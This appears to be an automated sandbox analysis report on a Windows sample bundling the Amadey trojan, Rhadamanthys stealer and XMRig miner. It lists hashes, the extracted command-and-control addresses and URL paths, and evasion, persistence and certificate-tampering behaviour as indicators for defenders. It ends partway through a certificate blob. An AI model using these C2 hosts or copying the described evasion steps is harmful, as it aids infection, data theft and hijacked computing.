amadey | 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967

Analysis

max time kernel
1195s
max time network
1209s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07/07/2024, 05:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys xmrig 9ea68e evasion execution miner persistence stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

9ea68e

http://185.209.162.226

http://89.23.103.42

http://94.232.249.157

Attributes

install_dir
3086a343d2
install_file
Hkbsse.exe
strings_key
c1146d53d04cb7bd7cd62d5f839db018
url_paths
/hb9IvshS01/index.php

/hb9IvshS02/index.php

/hb9IvshS03/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1648 created 2548	1648	plugin1515	44

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/5856-776-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-777-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-782-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-784-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-783-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-781-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/5856-780-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4220	powershell.exe
3648	powershell.exe
3476	powershell.exe
1248	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cc7-303.dat	upx
behavioral2/memory/5376-330-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral2/memory/672-524-0x0000000140000000-0x0000000140E40000-memory.dmp	upx
behavioral2/memory/5856-775-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-776-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-777-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-772-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-774-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-771-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-782-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-784-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-783-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-781-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-780-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/5856-773-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
167	bitbucket.org
164	raw.githubusercontent.com
165	raw.githubusercontent.com
166	bitbucket.org

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5940	powercfg.exe
5964	powercfg.exe
5948	powercfg.exe
5920	powercfg.exe
2528	powercfg.exe
6004	powercfg.exe
5404	powercfg.exe
1044	powercfg.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Launhcer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	3plugin18226
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Hkbsse.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kuytqawknxye.exe
File opened for modification	C:\Windows\system32\MRT.exe	2plugin28438
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
5376	2plugin28438
5376	2plugin28438
672	kuytqawknxye.exe
672	kuytqawknxye.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 672 set thread context of 5704	672	kuytqawknxye.exe	246
PID 672 set thread context of 5856	672	kuytqawknxye.exe	250

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	3plugin18226

Executes dropped EXE 32 IoCs

pid	Process
3028	Launhcer.exe
4916	Launcher.exe
1704	wget.exe
1572	winrar.exe
1648	plugin1515
2656	wget.exe
2204	winrar.exe
5376	2plugin28438
5408	wget.exe
4644	winrar.exe
2204	3plugin18226
5968	Hkbsse.exe
672	kuytqawknxye.exe
3464	Hkbsse.exe
5380	Hkbsse.exe
772	Hkbsse.exe
212	Hkbsse.exe
1268	Hkbsse.exe
3684	Hkbsse.exe
2628	Hkbsse.exe
1196	Hkbsse.exe
1872	Hkbsse.exe
5692	Hkbsse.exe
4448	Hkbsse.exe
2460	Hkbsse.exe
5672	Hkbsse.exe
5736	Hkbsse.exe
5572	Hkbsse.exe
3924	Hkbsse.exe
2844	Hkbsse.exe
5216	Hkbsse.exe
3416	Hkbsse.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5872	sc.exe
6076	sc.exe
5224	sc.exe
5292	sc.exe
5652	sc.exe
5760	sc.exe
5824	sc.exe
5624	sc.exe
6060	sc.exe
1100	sc.exe
5780	sc.exe
6128	sc.exe
1812	sc.exe
5628	sc.exe

Loads dropped DLL 1 IoCs

pid	Process
6088	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
768	1648	WerFault.exe	109
1648	2204	WerFault.exe	135
1664	2204	WerFault.exe	135
5616	2204	WerFault.exe	135
5272	2204	WerFault.exe	135
5324	2204	WerFault.exe	135
5700	2204	WerFault.exe	135
5764	2204	WerFault.exe	135
5880	2204	WerFault.exe	135
4948	2204	WerFault.exe	135
6096	2204	WerFault.exe	135
3452	5968	WerFault.exe	154
2040	5968	WerFault.exe	154
3388	5968	WerFault.exe	154
5640	5968	WerFault.exe	154
5304	5968	WerFault.exe	154
5284	5968	WerFault.exe	154
5740	5968	WerFault.exe	154
5780	5968	WerFault.exe	154
2684	5968	WerFault.exe	154
2600	5968	WerFault.exe	154
5952	5968	WerFault.exe	154
6008	5968	WerFault.exe	154
1240	5968	WerFault.exe	154
6072	5968	WerFault.exe	154
6040	5968	WerFault.exe	154
5828	3464	WerFault.exe	263
216	5380	WerFault.exe	271
6000	5968	WerFault.exe	154
3112	5968	WerFault.exe	154
2616	772	WerFault.exe	278
5428	5968	WerFault.exe	154
5716	5968	WerFault.exe	154
5596	5968	WerFault.exe	154
2944	212	WerFault.exe	287
3876	5968	WerFault.exe	154
6004	1268	WerFault.exe	292
4448	5968	WerFault.exe	154
5524	3684	WerFault.exe	297
6128	5968	WerFault.exe	154
5096	5968	WerFault.exe	154
264	5968	WerFault.exe	154
3932	2628	WerFault.exe	306
5232	5968	WerFault.exe	154
1464	5968	WerFault.exe	154
3692	5968	WerFault.exe	154
5320	1196	WerFault.exe	315
752	1872	WerFault.exe	318
4568	5968	WerFault.exe	154
5752	5968	WerFault.exe	154
3992	5968	WerFault.exe	154
3476	5692	WerFault.exe	327
5288	4448	WerFault.exe	330
2808	5968	WerFault.exe	154
372	2460	WerFault.exe	335
3252	5968	WerFault.exe	154
4300	5968	WerFault.exe	154
2584	5968	WerFault.exe	154
4344	5672	WerFault.exe	344
1196	5736	WerFault.exe	347
5596	5968	WerFault.exe	154
1460	5572	WerFault.exe	352
3528	5968	WerFault.exe	154
1348	5968	WerFault.exe	154

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1403246978-718555486-3105247137-1000\{CC0DFB98-F2D2-451C-A940-16B86220553E}	msedge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee